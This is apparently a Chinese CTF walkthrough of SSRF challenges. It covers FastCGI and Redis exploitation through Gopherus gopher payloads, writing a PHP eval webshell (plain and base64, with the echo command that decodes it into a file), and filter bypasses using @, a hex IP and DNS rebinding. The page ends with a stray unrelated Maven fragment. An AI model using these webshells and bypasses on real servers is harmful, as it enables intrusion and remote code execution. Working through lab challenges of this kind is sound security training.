06 FastCGI协议
漏洞原理
https://blog.csdn.net/mysteryflower/article/details/94386461
该关需要将一句话木马写入题目网站下,一句话木马要进行base64编码确实用双引号才可以。
一句话木马
<?php @eval($_POST[cmd]);?>base64编码
PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+打开kali,在Gopherus中打开终端
Gopherus---网盘自取
链接: https://pan.baidu.com/s/1xQjNOpsgpjFuMVOT1eIutg 提取码: zxin
使用Python运行gopherus,带参数
python2 gopherus.py --exploit fastcgi之后让填写一个php文件的目录,而题目网站中就有一个index.php
所以将此文件的网址给他就可以
/var/www/html/index.php下一步,让给它一个命令,这里,我们就要讲一句话木马写入到一个php文件中
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 2.php回车后得到一串payload,将这串payload进行URL编码
直接给到题目链接,这样我们的木马就写入到了题目链接中
接下来进行远程操控,这里使用的工具是菜刀
填写木马的网址和密码,将编码方式改为UTF-8就可以了
进入到网站根目录中,找到Flag文件里面就是目标Flag
07 Redis协议
这一关和上一关的fastcgi是一样的,只是服务变为了Redis
使用gopherus工具后,会先问你你想要ReverseShell还是PHPShell,这里选择后者
之后也是需要填一下目录,但是不用填文件名
下一步写一句话木马,不用base64编码
在之后得到一串payload
接下来的步骤和上一关一样,这里就不在赘述
08 URL BYpass
这一关是我们填写的URL必须包含他给的这一串网址 http://notfound.ctfhub.com
这里使用@符号进行书写,在@符号和http://的中间加的东西不影响网址的作用,所以构造payload
如下图所示
09 数字IP BYpass
这一关输入常规的的http://127.0.0.1/flag.php发现过滤了127、172还有@
所以这里将127改为十六进制,就是0x7f(0x是十六进制前缀)
测试发现网站把 . 也过滤了,那我们用0将 . 代替
就得到的最终的payload
http://0x7f000001/flag.php
这样就得了目标payload
10 302跳转 BYpass
这一关再输入常规的payload后提示我们这个IP坏的
就是不让我们使用这个IP
那我们就是用域名将IP替换
127.0.0.1的域名就是localhost
这样就得到了目标Flag
11 DNS重绑定 BYpass
这一关是需要DNS重绑定,具体概念可以参考下面链接
DNS重绑定介绍
接下来我们需要点进题目的附件中,会跳转到知乎的网站上,里面有一个链接,如下图
进入到网址之后,我们将127.0.0.1和127.0.0.2分别填入,在下面框中得到两个IP的十六进制的URL,将这个URL替换题目网站的127.0.0.1,就可以得到目标Flag
:Maven坐标,idea集成-导入maven项目(两种方式))
)
